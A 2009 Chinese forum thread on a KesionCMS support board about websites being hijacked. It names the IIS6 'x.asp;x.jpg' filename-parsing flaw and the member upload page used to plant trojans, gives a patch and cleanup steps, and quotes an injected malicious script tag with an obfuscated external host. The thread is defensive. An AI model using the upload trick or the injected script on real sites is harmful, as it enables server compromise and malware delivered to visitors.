账号通
    

账号  

密码  

31326

查看

94

回复
主题:[分享]这两天被挂马的注意了 [收藏主题] 转到:  
一生有你 当前离线

10439

主题

0

广播

18

粉丝
添加关注
级别:版主

用户积分:72521 分
登录次数:1969 次
注册时间:2006/7/1
最后登录:2021/8/25
一生有你 发表于:2009/9/14 21:35:00   | 只看该作者 查看该作者主题 楼主 
科汛在线商城系统(NET)

这两天看到部分用户站长被挂马,我整理了一下V6 sp1之前版本的漏洞原因


 


如果你的程序还没有升级到V6 sp1+你的服务器用的是win 2003+你没有将uploadfiles 目录的可执行权限关闭,可能出现被挂马


 


起因:


由于win 2003 iis6文件名解析漏洞原因引起的,iis6将会直接解释执行x.asp;x.jpg之类的文件名


 


V6 sp1之前的版本漏洞运行过程


 


首先找到使用科汛系统的网站,注册会员,然后输入KS_editor/selectupfiles.asp,这里就可以上传x.asp;x.jpg之类的木马并成功运行!


 


而这个漏洞sp1升级修复过了....


 


V6解决方法:


就是升级到v6 sp1,再给你的上传目录加把锁(见:http://bbs.kesion.com/dispbbs.asp?boardid=44&Id=82415)


V5.5版本解决方法:


用编辑工具打开user/UpFileSave.asp并找到478行左右


找到以下代码


     else
      SameFileExistTF = True
     End If
     if CheckFileType(AllowExtStr,FileExtName) = False then
      ErrStr = ErrStr & FileName & "文件上传失败,文件类型不允许\n允许的类型有" + AllowExtStr + "\n"
     end if
并修改成


else
      SameFileExistTF = True
     End If


'新增安全判断
     if instr(FileName,";")>0 or instr(lcase(FileName),".asp")>0 then
      ErrStr = ErrStr & FileName & "文件上传失败,文件名不合法\n"
     end if

     if CheckFileType(AllowExtStr,FileExtName) = False then
      ErrStr = ErrStr & FileName & "文件上传失败,文件类型不允许\n允许的类型有" + AllowExtStr + "\n"
     end if


     


增加上面红色的就行了!!!!


 


 


这里提醒下广大用户:


1、请务必及时跟着官方的脚本升级你的程序!!!做好自己的安全工作,比如access版本的及时改下数据库名称,修改下后台用户名!!!有服务器的用户请一定做好自己的目录安全,别心存侥幸心理。


2、升级到sp1后,请用科汛后台的在线木马查找功能,找出后门文件并删除(否则你将可能继续被挂马,功亏一篑);


3、一定要删除uploadfiles目录下,类似x.asp;x.jpg的文件


4、已经被挂马的用户,可以用以下工具上传到根目录,把恶意代码替换掉


 








 下载信息  [文件大小:2.6 KB  下载次数:359]
图片点击可在新窗口打开查看点击浏览该文件:iframe批量替换工具.rar


 


 


这里代表广大站长BS一下那些整天只会残害这些无辜站长的所谓hack!有时间就多为中国的互联网贡献吧!


 


 


 



 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
laijunwen 当前离线

27

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:365 分
登录次数:16 次
注册时间:2009/3/22
最后登录:2009/11/29
laijunwen 发表于:2009/10/1 22:36:00   | 只看该作者 查看该作者主题 沙发 
科汛在线考试系统(NET)

你好,我的站也是9月30号被挂上了一段代码。<script language="JavaScript" src="http://pt92%38.9966.org" type="text/javascript" id="scr7ipt1549"  ></script>就是这段代码。还有我发现1.我之前在我的空间放了几个不同的网站源码系统,我发现我其他的网站源码系统也被挂了这段代码。2.代码里的这个网址pt92%38.9966.org,不是固定的,有很多种网址,如:pt928.99%36%36.org还有我就没有打上来,因为实在太多了,用官方给我的“iframe批量替换工具”这个工具根本就搞不定,我想我的整个网站文件都被放了这个代码!  

 

    希望我的发现对官方有帮助!希望官方能尽快找出放马的人。。。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
高山流水 当前离线

730

主题

0

广播

2

粉丝
添加关注
级别:六年级

用户积分:3985 分
登录次数:627 次
注册时间:2006/11/3
最后登录:2024/3/1
高山流水 发表于:2009/9/27 8:18:00   | 只看该作者 查看该作者主题 藤椅 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
adltx1 当前离线

7

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:25 分
登录次数:1 次
注册时间:2009/9/20
最后登录:2009/9/20
adltx1 发表于:2009/9/20 14:33:00   | 只看该作者 查看该作者主题 板凳 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
coolzjj 当前离线

84

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:118 分
登录次数:31 次
注册时间:2009/9/16
最后登录:2016/12/21
coolzjj 发表于:2009/9/19 18:31:00   | 只看该作者 查看该作者主题 报纸 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
chixj 当前离线

29

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:292 分
登录次数:11 次
注册时间:2008/10/13
最后登录:2009/10/10
chixj 发表于:2009/9/18 10:36:00   | 只看该作者 查看该作者主题 地板 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
小虎 当前离线

3

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:35 分
登录次数:1 次
注册时间:2009/9/18
最后登录:2009/9/18
小虎 发表于:2009/9/18 0:54:00   | 只看该作者 查看该作者主题 7楼 
呵呵,一般把会员上传文件权限关了就没啥事了。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
kingzzf 当前离线

9

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:77 分
登录次数:11 次
注册时间:2009/9/17
最后登录:2011/4/30
kingzzf 发表于:2009/9/17 23:15:00   | 只看该作者 查看该作者主题 8楼 
做在线知识付费 选科汛云开店

从此不用风讯。改用科讯。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
pengzheng 当前离线

38

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:96 分
登录次数:11 次
注册时间:2009/9/8
最后登录:2009/11/10
pengzheng 发表于:2009/9/17 14:51:00   | 只看该作者 查看该作者主题 9楼 
科汛智能建站系统
感谢官方工作人员 极力的支持和帮助!
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
fzks 当前离线

56

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:183 分
登录次数:4 次
注册时间:2009/9/16
最后登录:2009/9/19
fzks 发表于:2009/9/17 10:02:00   | 只看该作者 查看该作者主题 10楼 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.23047秒 powered by KesionCMS 9.0